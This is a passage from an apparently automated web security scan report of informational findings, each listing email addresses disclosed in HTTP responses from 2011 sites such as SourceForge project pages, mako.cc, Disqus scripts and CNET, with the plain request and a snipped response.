Set-Cookie: as=40337; Expires=Wed, 26-Jan-2011 02:23:07 GMT; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: max-stale=0
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Type: text/xml;charset=UTF-8
Content-Length: 92452

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:apple-wallpapers="http://www.apple.com/
...[SNIP]...
<managingEditor>boards@parenthood.com (Parenthood)</managingEditor>
...[SNIP]...
<webMaster>boards@parenthood.com (Parenthood)</webMaster>
...[SNIP]...

24.84. http://klibido.sourceforge.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://klibido.sourceforge.net
Path:   /

Issue detail

The following email address was disclosed in the response:
  • bauno@inwind.it

Request

GET / HTTP/1.1
Host: klibido.sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Mon, 24 Jan 2011 22:38:54 GMT
Content-Type: text/html
Connection: close
Last-Modified: Sat, 04 Mar 2006 09:48:38 GMT
ETag: "7c92-40e2832a50980"
Accept-Ranges: bytes
Content-Length: 31890
Cache-Control: max-age=172800
Expires: Wed, 26 Jan 2011 22:38:54 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- $Id Exp $ -->
<!--Generated by quanta Plus template - freely use and distribute-->
<html>
<h
...[SNIP]...
<a href="mailto:bauno@inwind.it?subject=KLibido%20development">
...[SNIP]...

24.85. http://mako.cc/projects/aub/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mako.cc
Path:   /projects/aub/

Issue detail

The following email addresses were disclosed in the response:
  • avinash@acm.org
  • blong@fiction.net
  • mako@atdot.cc
  • mako@debian.org

Request

GET /projects/aub/ HTTP/1.1
Host: mako.cc
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:49:39 GMT
Server: Apache/2.2.9 (Debian) DAV/2 PHP/4.4.4-8+etch6
Last-Modified: Sat, 09 May 2009 23:28:20 GMT
ETag: "64496-1a72-4698319b88d00"
Accept-Ranges: bytes
Content-Length: 6770
Content-Type: text/html

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xml:lang="en" lang="en">
<h
...[SNIP]...
<a href="mailto:blong@fiction.net">&lt;blong@fiction.net&gt;</a>
...[SNIP]...
<a href="mailto:avinash@acm.org">&lt;avinash@acm.org&gt;</a>
...[SNIP]...
<a href="mailto:mako@debian.org">&lt;mako@debian.org&gt;</a>
...[SNIP]...
<a href="mailto:mako@debian.org">Benjamin Mako Hill &lt;mako@atdot.cc&gt;</a>
...[SNIP]...

24.86. http://mako.cc/projects/aub/ChangeLog

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mako.cc
Path:   /projects/aub/ChangeLog

Issue detail

The following email addresses were disclosed in the response:
  • cls@seawood.org
  • dirk@computer42.org

Request

GET /projects/aub/ChangeLog HTTP/1.1
Host: mako.cc
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:35:15 GMT
Server: Apache/2.2.9 (Debian) DAV/2 PHP/4.4.4-8+etch6
Last-Modified: Sat, 09 May 2009 23:28:20 GMT
ETag: "6447f-10f3-4698319b88d00"
Accept-Ranges: bytes
Content-Length: 4339
Connection: close
Content-Type: text/plain

2005-09-11 19:19 mako

   * aub: Finally packaged up all of the changes and made the new
   release. Better late than never.

2003-10-10 19:45 mako

   * aub: Lots of changes. Christopher Seawood <cls@seawood.org>
   contributed yEnc support, fixed some HOOK problems and submitted
   some fixes for AUTH issues as well as a line to make things work
   better on non-Linux platforms.
   
   dirk@computer42.org contributed a patch to make AUB set mode reader
   which fixes some NNTP access issues.

2002-06-02 14:42 mako

   * debian/changelog: Updated Debian information in preperation for a
   new release fixing
...[SNIP]...

24.87. http://mako.cc/projects/aub/docs/Introducing_AUB

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mako.cc
Path:   /projects/aub/docs/Introducing_AUB

Issue detail

The following email addresses were disclosed in the response:
  • avinash@acm.org
  • blong@fiction.net
  • mako@debian.org
  • stantz@sgi.com

Request

GET /projects/aub/docs/Introducing_AUB HTTP/1.1
Host: mako.cc
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:35:32 GMT
Server: Apache/2.2.9 (Debian) DAV/2 PHP/4.4.4-8+etch6
Last-Modified: Sat, 09 May 2009 23:28:20 GMT
ETag: "64480-6807-4698319b88d00"
Accept-Ranges: bytes
Content-Length: 26631
Connection: close
Content-Type: text/plain


           The Introducing AUB Document


   1.    What is aub?

   More and more people are posting binary files to usenet these days.
Some of these binaries are executables and audio data; a majority seem to
be p
...[SNIP]...
<stantz@sgi.com>
...[SNIP]...
<blong@fiction.net>
...[SNIP]...
<mako@debian.org>
...[SNIP]...
<avinash@acm.org>
...[SNIP]...

24.88. http://mako.cc/projects/aub/docs/aub.1.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mako.cc
Path:   /projects/aub/docs/aub.1.html

Issue detail

The following email addresses were disclosed in the response:
  • avinash@acm.org
  • blong@fiction.net
  • mako@debian.org

Request

GET /projects/aub/docs/aub.1.html HTTP/1.1
Host: mako.cc
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:35:36 GMT
Server: Apache/2.2.9 (Debian) DAV/2 PHP/4.4.4-8+etch6
Last-Modified: Sat, 09 May 2009 23:28:20 GMT
ETag: "64486-1372-4698319b88d00"
Accept-Ranges: bytes
Content-Length: 4978
Connection: close
Content-Type: text/html

<HTML
><HEAD
><TITLE
>aub</TITLE
><META
NAME="GENERATOR"
CONTENT="Modular DocBook HTML Stylesheet Version 1.76b+
"></HEAD
><BODY
CLASS="REFENTRY"
><H1
><A
NAME="AEN1">aub</H1
><DIV
CLASS="REFNAMEDIV"

...[SNIP]...
<A
HREF="mailto:blong@fiction.net"
>blong@fiction.net</A
>
...[SNIP]...
<A
HREF="mailto:avinash@acm.org"
>avinash@acm.org</A
>
...[SNIP]...
<A
HREF="mailto:mako@debian.org"
>mako@debian.org</A
>
...[SNIP]...

24.89. http://mako.cc/projects/aub/docs/aubconf.1.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mako.cc
Path:   /projects/aub/docs/aubconf.1.html

Issue detail

The following email addresses were disclosed in the response:
  • avinash@acm.org
  • blong@fiction.net
  • mako@debian.org

Request

GET /projects/aub/docs/aubconf.1.html HTTP/1.1
Host: mako.cc
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:35:40 GMT
Server: Apache/2.2.9 (Debian) DAV/2 PHP/4.4.4-8+etch6
Last-Modified: Sat, 09 May 2009 23:28:20 GMT
ETag: "64487-2dbc-4698319b88d00"
Accept-Ranges: bytes
Content-Length: 11708
Connection: close
Content-Type: text/html

<HTML
><HEAD
><TITLE
>aubconf</TITLE
><META
NAME="GENERATOR"
CONTENT="Modular DocBook HTML Stylesheet Version 1.76b+
"></HEAD
><BODY
CLASS="REFENTRY"
><H1
><A
NAME="AEN1">aubconf</H1
><DIV
CLASS="REFN
...[SNIP]...
<A
HREF="mailto:blong@fiction.net"
>blong@fiction.net</A
>
...[SNIP]...
<A
HREF="mailto:avinash@acm.org"
>avinash@acm.org</A
>
...[SNIP]...
<A
HREF="mailto:mako@debian.org"
>mako@debian.org</A
>
...[SNIP]...

24.90. http://mako.cc/projects/aub/download/aub_2.2.tar.gz

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mako.cc
Path:   /projects/aub/download/aub_2.2.tar.gz

Issue detail

The following email addresses were disclosed in the response:
  • avinash@acm.org
  • blong@fiction.net
  • cls@seawood.org
  • dirk@computer42.org
  • geddes@debian.org
  • jkominek@debian.org
  • jkominek@xtn.net
  • mako@debian.org
  • rhertzog@hrnet.fr

Request

GET /projects/aub/download/aub_2.2.tar.gz HTTP/1.1
Host: mako.cc
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:35:25 GMT
Server: Apache/2.2.9 (Debian) DAV/2 PHP/4.4.4-8+etch6
Last-Modified: Sat, 09 May 2009 23:28:20 GMT
ETag: "64490-ade3-4698319b88d00"
Accept-Ranges: bytes
Connection: close
Content-Type: application/x-gzip
Content-Length: 163840

aub-2.2/............................................................................................0000755.0001750.0001750.00000000000.10311134735.010562. 5...........................................
...[SNIP]...
<cls@seawood.org>
   contributed yEnc support, fixed some HOOK problems and submitted
   some fixes for AUTH issues as well as a line to make things work
   better on non-Linux platforms.
   
   dirk@computer42.org contributed a patch to make AUB set mode reader
   which fixes some NNTP access issues.

2002-06-02 14:42 mako

   * debian/changelog: Updated Debian information in preperation for a
   new release fixing
...[SNIP]...
<mako@debian.org>
...[SNIP]...
.0 8/92.     Major rewrite, numerous enhancements, speed hacks.
        Now requires a formal configuration file.
v2.0.5 2/97 HP-UX version with various fixes
v2.0.6 6/97 blong@fiction.net
added @kill_subj, a list of regex used for a
simple killfiling based on subjects. Hardcoded,
default is to kill articles with m
...[SNIP]...
also, removed dependency on sys/socket.ph, just
defined the values in this file
updated for perl5 as well
v2.0.7 2/98 blong@fiction.net
don't grab articles one at a time if using XHDR,
ask for them all (especially useful now with the
high number of canceled spam in the binary
groups)
v2.0.8 5/98 blong@fiction.net
Fixed bug in handling of unresolved articles,
forgot to fix a function call from the XHDR
improvement
v2.0.9 5/98 blong@fiction.net
now handles some MIME/Base64 articles
also, handles articles that only specify a hint
in the subject, and no piece information
v2.0.10 10/98 blong@fiction.net
Attempts to use authinfo for NNTP authorization
v2.0.11 11/01 avinash@acm.org
(v2.1) See below.

----------------------------------------------------------------------
v2.1 -- Nov01 avinash:
-- Removed most ` ` system() commands - major reduction in CPU load

...[SNIP]...
-------------------------------------------------
aub - Assemble Usenet Binaries

Original Author:
Mark Stantz        [1992] [Nov2001: no valid email addresses known]

Updates:
2.0.5 to 2.0.10    [1998] blong@fiction.net    Brandon Long
2.1            [2001] avinash@acm.org        Avinash Chopde
2.1.1+ [2002] mako@debian.org Mako Hill
----------------------------------------------------------------------------

REQUIREMENTS
------------------------

* >
...[SNIP]...
onf's manpage (in man, html, and source DocBook sgml format)


----------------------------------------------------------------------------
AUB HOME: http://yukidoke.org/~mako/projects/aub/

Mako Hill
mako@debian.org
http://people.debian.org/~mako/

...[SNIP]...
............................#!/usr/bin/perl
#
# aub: assemble usenet binaries
#
# Original Author:
# Mark Stantz        [1992] [Nov01: no valid email addresses known]
#
# Updates:
# 2.0.5 to 2.0.10    [1998] blong@fiction.net    Brandon Long
# 2.1            [2001] avinash@acm.org        Avinash Chopde
# 2.1.1 and beyond
# [2002] mako@debian.org Mako Hill
#
# This code is offered as-is. Anyone is welcome to make improvements,
# provided that my notice of authorship is retained. I accept no
# responsibility for loss or damage caused
...[SNIP]...
<mako@debian.org>
...[SNIP]...
<email>mako@debian.org</email>
...[SNIP]...
<email>blong@fiction.net</email>
...[SNIP]...
<email>avinash@acm.org</email>
...[SNIP]...
<email>mako@debian.org</email>
...[SNIP]...
<mako@debian.org>
...[SNIP]...
<email>mako@debian.org</email>
...[SNIP]...
<email>blong@fiction.net</email>
...[SNIP]...
<email>avinash@acm.org</email>
...[SNIP]...
<email>mako@debian.org</email>
...[SNIP]...
<mako@debian.org>
...[SNIP]...
<mako@debian.org>
...[SNIP]...
<mako@debian.org>
...[SNIP]...
<mako@debian.org>
...[SNIP]...
<mako@debian.org>
...[SNIP]...
<mako@debian.org>
...[SNIP]...
<mako@debian.org>
...[SNIP]...
<rhertzog@hrnet.fr>
...[SNIP]...
<geddes@debian.org>
...[SNIP]...
<jkominek@debian.org>
...[SNIP]...
<jkominek@xtn.net>
...[SNIP]...
<mako@debian.org>
...[SNIP]...
<mako@debian.org>
...[SNIP]...

24.91. http://mediacdn.disqus.com/1295633860/build/system/disqus.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mediacdn.disqus.com
Path:   /1295633860/build/system/disqus.js

Issue detail

The following email addresses were disclosed in the response:
  • anton@disqus.com
  • oyvind@kinsey.no

Request

GET /1295633860/build/system/disqus.js? HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://www1.whdh.com/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-473502224-1295482487215

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 21:55:22 GMT
Expires: Wed, 23 Feb 2011 21:55:22 GMT
Server: Apache/2.2.14 (Ubuntu)
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Vary: Accept-Encoding
X-Cache-Lookup: HIT from media.disqus.com:3128
Content-Type: application/javascript
Last-Modified: Fri, 21 Jan 2011 18:30:56 GMT
X-Origin-Date: Fri, 21 Jan 2011 18:33:59 GMT
X-Origin-Expires: Sun, 20 Feb 2011 18:33:59 GMT
X-Cache-Age: 12703
X-Cache: HIT from cdce-nym011-013.nym011.internap.com
X-Origin-Date: Mon, 24 Jan 2011 14:08:09 GMT
X-Origin-Expires: Sun, 20 Feb 2011 22:05:42 GMT
X-Cache-Age: 28033
X-Cache: HIT from cdce-nym011-013.nym011.internap.com
Via: 1.0 cdce-nym011-013.nym011.internap.com:1082 (squid/2.7.STABLE7), 1.0 cdce-nym011-013.nym011.internap.com:80 (squid/2.7.STABLE7)
Connection: keep-alive
Content-Length: 166572

var DISQUS;if(typeof DISQUS=="undefined"){throw"Can't find DISQUS"}DISQUS.dtpl=(function(){var a={version:"0.2",author:"Anton Kovalyov <anton@disqus.com>"};a.getGuestFields=function(f){function e(g){r
...[SNIP]...
tListener)}};documentListener=c.events.add(document,"click",f)};c.Tooltip=d;c.ManualTooltip=a})(DISQUS);DISQUS.modules.tooltip=true;
/*
* The MIT License
*
* Copyright (c) 2009 Øyvind Sean Kinsey, oyvind@kinsey.no
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restricti
...[SNIP]...

24.92. http://mediacdn.disqus.com/1295633860/js/dist/lib.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mediacdn.disqus.com
Path:   /1295633860/js/dist/lib.js

Issue detail

The following email address was disclosed in the response:
  • oyvind@kinsey.no

Request

GET /1295633860/js/dist/lib.js HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://7newsboston.disqus.com/thread/whdh_tv_commuter_rail_service_updates_for_jan_24_22/reply.html?f=7newsboston&t=whdh_tv_commuter_rail_service_updates_for_jan_24_22&ff=Helvetica%20Neue%2C%20Helvetica%2C%20arial&p=Type%20your%20comment%20here.&ifrs=&1295906169624&xdm_e=http%3A%2F%2Fwww1.whdh.com&xdm_c=default6500&xdm_p=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-473502224-1295482487215

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 21:55:33 GMT
Expires: Wed, 23 Feb 2011 21:55:33 GMT
Server: Apache/2.2.14 (Ubuntu)
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Vary: Accept-Encoding
X-Cache-Lookup: HIT from chafe.disqus.net:3128
Content-Type: application/javascript
Last-Modified: Fri, 21 Jan 2011 18:30:51 GMT
X-Origin-Date: Fri, 21 Jan 2011 18:33:54 GMT
X-Origin-Expires: Sun, 20 Feb 2011 18:33:54 GMT
X-Cache-Age: 20181
X-Cache: HIT from cdce-nym011-012.nym011.internap.com
X-Origin-Date: Mon, 24 Jan 2011 17:56:03 GMT
X-Origin-Expires: Mon, 21 Feb 2011 00:10:15 GMT
X-Cache-Age: 14370
X-Cache: HIT from cdce-nym011-012.nym011.internap.com
Via: 1.0 cdce-nym011-012.nym011.internap.com:1082 (squid/2.7.STABLE7), 1.0 cdce-nym011-012.nym011.internap.com:80 (squid/2.7.STABLE7)
Connection: keep-alive
Content-Length: 104980

/*
* jQuery JavaScript Library v1.4.2
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Sizz
...[SNIP]...
<e.length;j++){k.removeAttribute(e[j].name)}k.save(d)}}}}}catch(f){}return c})()});
/*
* The MIT License
*
* Copyright (c) 2009 Øyvind Sean Kinsey, oyvind@kinsey.no
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restricti
...[SNIP]...

24.93. http://mozex.mozdev.org/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mozex.mozdev.org
Path:   /index.html

Issue detail

The following email address was disclosed in the response:
  • vlmarek@volny.cz

Request

GET /index.html HTTP/1.1
Host: mozex.mozdev.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:42:57 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.12
Content-Length: 9384

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<title>mozdev.org - mozex: index</title>
<link href="//www.mozdev.org/skin/winter
...[SNIP]...
<a href="mailto:vlmarek@volny.cz">vlmarek@volny.cz</a>
...[SNIP]...

24.94. http://multisuck.sourceforge.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://multisuck.sourceforge.net
Path:   /

Issue detail

The following email address was disclosed in the response:
  • conrads@cox.net

Request

GET / HTTP/1.1
Host: multisuck.sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Mon, 24 Jan 2011 22:43:00 GMT
Content-Type: text/html
Connection: close
Last-Modified: Thu, 06 Jun 2002 18:10:26 GMT
ETag: "6a7-3a2c3dc270880"
Accept-Ranges: bytes
Content-Length: 1703
Cache-Control: max-age=172800
Expires: Wed, 26 Jan 2011 22:43:00 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Multisuck</title>


...[SNIP]...
<a href="mailto:conrads@cox.net">
...[SNIP]...

24.95. http://news.cnet.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.cnet.com
Path:   /

Issue detail

The following email address was disclosed in the response:
  • tips-ne@cnet.com

Request

GET / HTTP/1.1
Host: news.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:25:29 GMT
Via: HTTP/1.0 phx1-rb-frontend1-app6.cnet.com:8923 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en-US
Expires: Tue, 25 Jan 2011 14:26:59 GMT
Age: 30
Content-Type: text/html; charset=UTF-8
Set-Cookie: tempSessionId=Cg5gn00+3VmtwdbzK1U; domain=.cnet.com; path=/; expires=Fri, 22-Jan-2021 14:25:29 GMT
Set-Cookie: arrowLat=1295965529634; domain=.cnet.com; path=/; expires=Wed, 25-Jan-2012 14:25:29 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Thu, 24-Feb-2011 14:25:29 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: max-age=120
Keep-Alive: timeout=15, max=932
Connection: Keep-Alive
Content-Length: 84113

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <!-- Yoda loves you -->
<head> <title>Technolog
...[SNIP]...
<a id="tips" href="mailto:tips-ne@cnet.com">
...[SNIP]...

24.96. http://newspost.unixcab.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newspost.unixcab.org
Path:   /

Issue detail

The following email address was disclosed in the response:
  • newspost@sdf.lonestar.org

Request

GET / HTTP/1.1
Host: newspost.unixcab.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:45:56 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e DAV/2
Last-Modified: Sat, 10 May 2003 19:24:37 GMT
ETag: "39f748-2fd3-3bd544bd5f2f0"
Accept-Ranges: bytes
Content-Length: 12243
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Newspost - a usenet binary autoposter for unix</title>

...[SNIP]...
<a href="mailto:newspost@sdf.lonestar.org">
...[SNIP]...
<a href="mailto:newspost@sdf.lonestar.org">newspost@sdf.lonestar.org</a>
...[SNIP]...

24.97. http://newsstar.sourceforge.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsstar.sourceforge.net
Path:   /

Issue detail

The following email address was disclosed in the response:
  • h@realh.co.uk

Request

GET / HTTP/1.1
Host: newsstar.sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Mon, 24 Jan 2011 22:46:02 GMT
Content-Type: text/html
Connection: close
Last-Modified: Thu, 02 Oct 2008 18:00:49 GMT
ETag: "1aa1-45848ff2ef6c5"
Accept-Ranges: bytes
Content-Length: 6817
Cache-Control: max-age=172800
Expires: Wed, 26 Jan 2011 22:46:01 GMT

<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Newsstar</title><meta name="generator" content="DocBook XSL Stylesheets V1.73.2"><link rel="start" href="index.htm
...[SNIP]...
<a class="email" href="mailto:h@realh.co.uk">h@realh.co.uk</a>
...[SNIP]...

24.98. http://noffle.sourceforge.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://noffle.sourceforge.net
Path:   /

Issue detail

The following email addresses were disclosed in the response:
  • martin@godisch.de
  • paul@wurtel.demon.nl

Request

GET / HTTP/1.1
Host: noffle.sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Mon, 24 Jan 2011 22:46:11 GMT
Content-Type: text/html
Connection: close
Last-Modified: Fri, 28 Feb 2003 22:53:45 GMT
ETag: "1525-3b7c2f1005040"
Accept-Ranges: bytes
Content-Length: 5413
Cache-Control: max-age=172800
Expires: Wed, 26 Jan 2011 22:46:11 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title>Noffle</title>
<META HTTP-EQUIV="content-type" CONTENT="text/html; charset=iso-8859-1">
<META NAME="description" C
...[SNIP]...
<a href="mailto:paul@wurtel.demon.nl">
...[SNIP]...
<a href="mailto:martin@godisch.de">
...[SNIP]...

24.99. http://noisybox.net/computers/nzbperl/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://noisybox.net
Path:   /computers/nzbperl/

Issue detail

The following email addresses were disclosed in the response:
  • beheerder@gmail.com
  • jason@noisybox.net
  • nzbperl-subscribe@googlegroups.com
  • nzbperl-unsubscribe@googlegroups.com

Request

GET /computers/nzbperl/ HTTP/1.1
Host: noisybox.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:45:53 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 35630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <link rel="icon" href="/images/favicon.ico" type="image/x-icon"/>
   <link re
...[SNIP]...
<a href="mailto:jason@noisybox.net">
...[SNIP]...
<a href="mailto:nzbperl-subscribe@googlegroups.com">nzbperl-subscribe@googlegroups.com</a>
...[SNIP]...
<a href="mailto:jason@noisybox.net">
...[SNIP]...
<li>
   Add option (--badNZB or similar) that can call a script when a "bad" NZB is hit (see
   google groups thread from beheerder@gmail.com).
   </li>
...[SNIP]...
<a href="mailto:nzbperl-subscribe@googlegroups.com">nzbperl-subscribe@googlegroups.com</a>
...[SNIP]...
<a href="mailto:nzbperl-unsubscribe@googlegroups.com">nzbperl-unsubscribe@googlegroups.com</a>
...[SNIP]...
<a href="mailto:jason@noisybox.net">
...[SNIP]...
<a href="mailto:jason@noisybox.net">
...[SNIP]...

24.100. http://offog.org/code/rawdog.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://offog.org
Path:   /code/rawdog.html

Issue detail

The following email address was disclosed in the response:
  • ats@offog.org

Request

GET /code/rawdog.html HTTP/1.1
Host: offog.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:46:43 GMT
Server: Apache/2.2.16 (Debian)
Last-Modified: Mon, 03 Jan 2011 13:29:28 GMT
ETag: "3efdb-3473-498f124283e00"
Accept-Ranges: bytes
Content-Length: 13427
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<
...[SNIP]...
<a href="mailto:ats@offog.org" accesskey="9"><code>ats@offog.org</code>
...[SNIP]...

24.101. http://people.joomla.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://people.joomla.org
Path:   /

Issue detail

The following email address was disclosed in the response:
  • info@emc23.com

Request

GET / HTTP/1.1
Host: people.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:47:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 33e27d3d0725f34a77c307be63476b5b=df72bb7ce303a3507e4fbb9caac60af7; path=/
Set-Cookie: currentURI=http%3A%2F%2Fpeople.joomla.org%2F; expires=Tue, 25-Jan-2011 22:47:57 GMT; path=/
Last-Modified: Mon, 24 Jan 2011 22:47:57 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 104112

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
elease Party Jan 27th::Dublin JOOMLA 1.6 Release Party.
Longstone Pub Jan 27th Townsend Street. Upstairs 18:00-20:00 pm
